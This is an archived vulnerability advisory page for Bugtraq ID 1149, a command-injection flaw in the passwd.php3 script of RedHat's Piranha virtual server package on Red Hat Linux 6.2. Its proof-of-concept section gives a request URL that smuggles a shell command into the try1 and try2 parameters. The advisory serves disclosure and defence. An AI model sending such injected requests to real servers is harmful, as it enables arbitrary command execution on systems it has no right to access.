RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability

BID:1149

Info

RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability

Bugtraq ID: 1149
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Apr 24 2000 12:00AM
Updated: Apr 24 2000 12:00AM
Credit: This vulnerability was announced on April 24, 2000 in an advisory from ISS. Exploit details were provided in a post to the Bugtraq mailing list by Max Vision <[email protected]>
Vulnerable: Redhat piranha-gui-0.4.12-1.i386.rpm
+ Redhat Linux 6.2
Redhat Linux 6.2 sparc
Redhat Linux 6.2 i386
Redhat Linux 6.2 alpha
Not Vulnerable:

Discussion

RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability

A vulnerability exists in the passwd.php3 cgi-bin script, as included by RedHat as part of the Piranha virtual server package, in RedHat Linux 6.2. Due to improper checking of input, it is possible for any user who can authenticate to the Piranha package to execute arbitrary commands, with the effective id of the web server. This may be used to leverage access to the machine, resulting in further compromise.

Exploit / POC

RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability

Execute the following url, using a username and password to authenticate: http://victim.example.com/piranha/secure/passwd.php3

Next, execute the following: http://victim.example.com/piranha/secure/passwd.php3?try1=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&try2=g23+%3B+touch+%2Ftmp%2Fr00ted+%3B&passwd=ACCEPT

This will touch a file in /tmp named r00ted. More complex attacks are certainly possible.

Solution / Fix

References

RedHat Piranha Virtual Server Package passwd.php3 Arbitrary Command Execution Vulnerability

References:
© CVE.report 2026 |

Use of this information constitutes acceptance for use in an AS IS condition. There are NO warranties, implied or otherwise, with regard to this information or its use. Any use of this information is at the user's risk. It is the responsibility of user to evaluate the accuracy, completeness or usefulness of any information, opinion, advice or other content. EACH USER WILL BE SOLELY RESPONSIBLE FOR ANY consequences of his or her direct or indirect use of this web site. ALL WARRANTIES OF ANY KIND ARE EXPRESSLY DISCLAIMED. This site will NOT BE LIABLE FOR ANY DIRECT, INDIRECT or any other kind of loss.

CVE, CWE, and OVAL are registred trademarks of The MITRE Corporation and the authoritative source of CVE content is MITRE's CVE web site. This site includes MITRE data granted under the following license.

Free CVE JSON API cve.report/api

CVE.report and Source URL Uptime Status status.cve.report